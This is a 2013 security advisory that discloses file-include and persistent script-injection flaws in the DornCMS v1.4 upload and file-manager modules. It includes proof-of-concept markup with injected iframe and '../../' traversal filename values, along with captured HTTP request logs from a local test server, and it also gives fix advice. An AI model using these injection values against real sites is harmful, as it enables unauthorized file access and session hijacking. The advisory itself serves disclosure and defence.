400 lines
No EOL
15 KiB
Text
400 lines
No EOL
15 KiB
Text
Document Title:
|
|
===============
|
|
DornCMS Application v1.4 - Multiple Web Vulnerabilities
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
http://www.vulnerability-lab.com/get_content.php?id=1113
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2013-10-14
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
1113
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
6.6
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
This is a simple, easy to use, PHP Content Management System that is geared toward personal or
|
|
informational websites with minimal interactivity.
|
|
|
|
(Copy of the Homepage: http://sourceforge.net/projects/dorncms/ )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the DornCMS v1.4 web-application.
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2013-10-14: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
SourceForge
|
|
Product: DornCMS - Web Application 1.4
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
High
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
1.1
|
|
A file include and a post inject vulnerability are detected in the Dorn Content Management System v1.4 web-application.
|
|
The file include web vulnerability allows remote attackers to inject files with malicious context via POST method.
|
|
|
|
The vulnerability is located in the `Upload` module in the Browse File section. Remote attackers are able to manipulate
|
|
in the upload POST method request the filename value. The code or commands as filename executes in the index module file
|
|
dir listing. In the exploitation phase the vulnerability allows an attacker to combine the script code inject with the
|
|
file/path request for unauthorized access.
|
|
|
|
Exploitation of the local file include web vulnerability requires no user interaction or privileged application user
|
|
account with password. Successful exploitation of the vulnerability results in unauthorized local file and path requests
|
|
to compromise the device or application.
|
|
|
|
Request Method(s):
|
|
[+] [POST]
|
|
|
|
Vulnerable Module(s):
|
|
[+] Upload > Browse File
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] filename (name)
|
|
|
|
Affected Module(s):
|
|
[+] File Manager - File Dir Listing
|
|
|
|
|
|
|
|
1.2
|
|
A persistent input validation web vulnerability is detected in the Dorn Content Management System v1.4 web-application.
|
|
The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the device.
|
|
|
|
The vulnerability is located in the file manager module. The file manager module allows the user to include regular files to the
|
|
web-server system. Attackers are able to inject own malicious script codes as file name by tampering the upload POST method request.
|
|
The execution of the code occurs in the file manager data list in the left bar. After the inject the code will be permanent executed
|
|
and its not possible to delete via application function.
|
|
|
|
Exploitation of the persistent web vulnerability requires low user interaction and a privileged web-application user account.
|
|
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent
|
|
web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.
|
|
|
|
Request Method(s):
|
|
[+] [POST]
|
|
|
|
Vulnerable Module(s):
|
|
[+] Add Sub Directory (FileManager)
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] directory - name
|
|
|
|
Affected Module(s):
|
|
[+] File Manager Folder Listing
|
|
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
1.1
|
|
The local file include web vulnerability can be exploited by remote attackers with privileged application user account
|
|
and without user interaction. For demonstration or reproduce ...
|
|
|
|
|
|
Vulnerable Module: Upload > Browse File
|
|
Affected: Current Directory: files/ name as path value
|
|
|
|
|
|
|
|
PoC: Upload > Browse File - files/ Name
|
|
|
|
<div id="fileinfo_holder">
|
|
Current Directory: <span id="current_path">files/</span>
|
|
<div id="fileinfo"><table class="standard">
|
|
<tbody><tr>
|
|
<th class="ui-state-active">
|
|
</th><th class="ui-state-active">Name</th>
|
|
<th class="ui-state-active">Preview</th>
|
|
<th class="ui-state-active">Size</th>
|
|
<th class="ui-state-active"> </th>
|
|
</tr>
|
|
<tr><td><input value="files/<iframe src=a>" type="checkbox"></td>
|
|
<td><a href="/dorncms/files/<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]>" target="_blank"><iframe src="a"></a></td>
|
|
<td style='width: 300px;'><em>no preview</em></td><td>51 kb</td>
|
|
<td><a href='/dorncms/cms/delete_file/?name=files%2F%3C<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]'
|
|
class='ajax_link delete'>delete</a> | <a href='/dorncms/cms/rename_file/?name=files%2F%3C<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]"<'
|
|
class='ajax_link rename'>rename</a></td></tr></table></iframe></a></td></tr></tbody></table></div></div>
|
|
|
|
|
|
|
|
--- PoC Session Request Logs ---
|
|
Status: 200[OK]
|
|
POST http://dorn.localhost:8080/dorncms/cms/doajaxfileupload/?directory=files/
|
|
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
|
|
Content Size[46] Mime Type[text/html]
|
|
|
|
Request Headers:
|
|
Host[dorn.localhost:8080]
|
|
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
|
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
|
Accept-Language[en-US,en;q=0.5]
|
|
Accept-Encoding[gzip, deflate]
|
|
DNT[1]
|
|
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
|
|
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
|
|
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
|
|
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
|
|
__utmb=87180614.6.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
|
|
Connection[keep-alive]
|
|
|
|
Post Data:
|
|
POST_DATA[-----------------------------7708139255231
|
|
Content-Disposition: form-data; name="fileToUpload"; filename="<<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]>"
|
|
Content-Type: image/png
|
|
‰PNG
|
|
|
|
|
|
Status: 200[OK]
|
|
POST http://dorn.localhost:8080/dorncms/cms/filelist/
|
|
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
|
|
Content Size[318]
|
|
Mime Type[text/html]
|
|
|
|
Request Headers:
|
|
Host[dorn.localhost:8080]
|
|
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
|
|
Accept[*/*]
|
|
Accept-Language[en-US,en;q=0.5]
|
|
Accept-Encoding[gzip, deflate]
|
|
DNT[1]
|
|
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
|
X-Requested-With[XMLHttpRequest]
|
|
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
|
|
Content-Length[13]
|
|
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
|
|
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
|
|
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
|
|
__utmb=87180614.6.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
|
|
Connection[keep-alive]
|
|
Pragma[no-cache]
|
|
Cache-Control[no-cache]
|
|
|
|
Post Data:
|
|
path[files%2F]
|
|
Response Headers:
|
|
Date[Sun, 13 Oct 2013 19:25:57 GMT]
|
|
Server[Apache]
|
|
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
|
|
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
|
Pragma[no-cache]
|
|
Vary[Accept-Encoding]
|
|
Content-Encoding[gzip]
|
|
Content-Length[318]
|
|
Keep-Alive[timeout=2, max=99]
|
|
Connection[Keep-Alive]
|
|
Content-Type[text/html]
|
|
Status: 200[OK]
|
|
|
|
GET http://dorn.localhost:8080/dorncms/cms/upload/file/<../../[LOCAL FILE/PATH INCLUDE VULNERABILITY!]
|
|
Load Flags[LOAD_DOCUMENT_URI ]
|
|
Content Size[20]
|
|
Mime Type[text/html]
|
|
|
|
Request Headers:
|
|
Host[dorn.localhost:8080]
|
|
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
|
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
|
Accept-Language[en-US,en;q=0.5]
|
|
Accept-Encoding[gzip, deflate]
|
|
DNT[1]
|
|
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
|
|
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
|
|
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
|
|
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
|
|
__utmb=87180614.6.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
|
|
Connection[keep-alive]
|
|
|
|
Response Headers:
|
|
Date[Sun, 13 Oct 2013 19:25:58 GMT]
|
|
Server[Apache]
|
|
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
|
|
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
|
Pragma[no-cache]
|
|
Vary[Accept-Encoding]
|
|
Content-Encoding[gzip]
|
|
Content-Length[20]
|
|
Keep-Alive[timeout=2, max=98]
|
|
Connection[Keep-Alive]
|
|
Content-Type[text/html]
|
|
|
|
|
|
|
|
|
|
1.2
|
|
The persistent web vulnerability can be exploited by remote attakers with privileged application user account and low
|
|
user interaction. For demonstration or reproduce ...
|
|
|
|
|
|
PoC: Add Sub Directory (File Manager)
|
|
|
|
<ul class="jqueryFileTree">
|
|
<li class="directory"><a href="#" rel="uploadedimages/" id="uploadedimages">images</a>
|
|
</li>
|
|
<li class="directory"><a class="selected" href="#" rel="files/" id="files">files</a>
|
|
<ul class="jqueryFileTree"><li class="directory"><a href="#"
|
|
rel="files></a>>"<[PERSISTENT SCRIPT CODE VULNERABILITY!]"<;)<">>"
|
|
<<../../x"<;)<">>)<</a></li></ul></li>
|
|
</ul></iframe></a></li></ul></li></ul>
|
|
|
|
|
|
|
|
--- PoC Session Request Logs ---
|
|
Status: 200[OK]
|
|
GET http://dorn.localhost:8080/dorncms/cms/folderlist/
|
|
Load Flags[LOAD_BACKGROUND ]
|
|
Content Size[186]
|
|
Mime Type[text/html]
|
|
|
|
Request Headers:
|
|
Host[dorn.localhost:8080]
|
|
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
|
|
Accept[*/*]
|
|
Accept-Language[en-US,en;q=0.5]
|
|
Accept-Encoding[gzip, deflate]
|
|
DNT[1]
|
|
X-Requested-With[XMLHttpRequest]
|
|
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
|
|
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
|
|
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
|
|
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
|
|
__utmb=87180614.5.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
|
|
Connection[keep-alive]
|
|
|
|
|
|
Response Headers:
|
|
Date[Sun, 13 Oct 2013 19:19:41 GMT]
|
|
Server[Apache]
|
|
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
|
|
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
|
Pragma[no-cache]
|
|
Vary[Accept-Encoding]
|
|
Content-Encoding[gzip]
|
|
Content-Length[186]
|
|
Keep-Alive[timeout=2, max=98]
|
|
Connection[Keep-Alive]
|
|
Content-Type[text/html]
|
|
|
|
|
|
Status: 200[OK]
|
|
GET http://dorn.localhost:8080/dorncms/cms/upload/file/[PERSISTENT SCRIPT CODE VULNERABILITY!]"<
|
|
Load Flags[LOAD_DOCUMENT_URI ]
|
|
Content Size[20]
|
|
Mime Type[text/html]
|
|
|
|
Request Headers:
|
|
Host[dorn.localhost:8080]
|
|
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
|
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
|
Accept-Language[en-US,en;q=0.5]
|
|
Accept-Encoding[gzip, deflate]
|
|
DNT[1]
|
|
Referer[http://dorn.localhost:8080/dorncms/cms/upload/file/]
|
|
Cookie[__utma=87180614.576957282.1381681699.1381688518.1381691247.5; __utmc=87180614;
|
|
__utmz=87180614.1381681699.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
|
|
uvts=iexqgvWCEnvk3fI; __gads=ID=510fdc08255814de:T=1381681756:S=ALNI_MZliqnNeNYBzuLMn-8D_tU8PM_Ugg;
|
|
__utmb=87180614.5.10.1381691247; PHPSESSID=036s0d3jidrcp2mrapst0uqdb5]
|
|
Connection[keep-alive]
|
|
|
|
|
|
Response Headers:
|
|
Date[Sun, 13 Oct 2013 19:19:41 GMT]
|
|
Server[Apache]
|
|
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
|
|
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
|
Pragma[no-cache]
|
|
Vary[Accept-Encoding]
|
|
Content-Encoding[gzip]
|
|
Content-Length[20]
|
|
Keep-Alive[timeout=2, max=97]
|
|
Connection[Keep-Alive]
|
|
Content-Type[text/html]
|
|
|
|
|
|
Solution - Fix & Patch:
|
|
=======================
|
|
1.1
|
|
Restrict the upload function and input by a secure escape and clean parse to ensure no execution occurs.
|
|
Filter and parse also the main folder name listing were the output is executed.
|
|
|
|
1.2
|
|
The second vulnerability can be patched by a secure restriction and encode of the add sub directory function in the file manager module.
|
|
Parse also the vulnerable output in the file manager listing even if the input is already encoded.
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
1.1
|
|
The security risk of the local file include web vulnerability is estimated as high(+).
|
|
|
|
1.2
|
|
The security risk of the persistent input validation web vulnerability is estimated as medium(+).
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
|
or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
|
DOMAIN: www.vulnerability-lab.com
|
|
CONTACT: research@vulnerability-lab.com |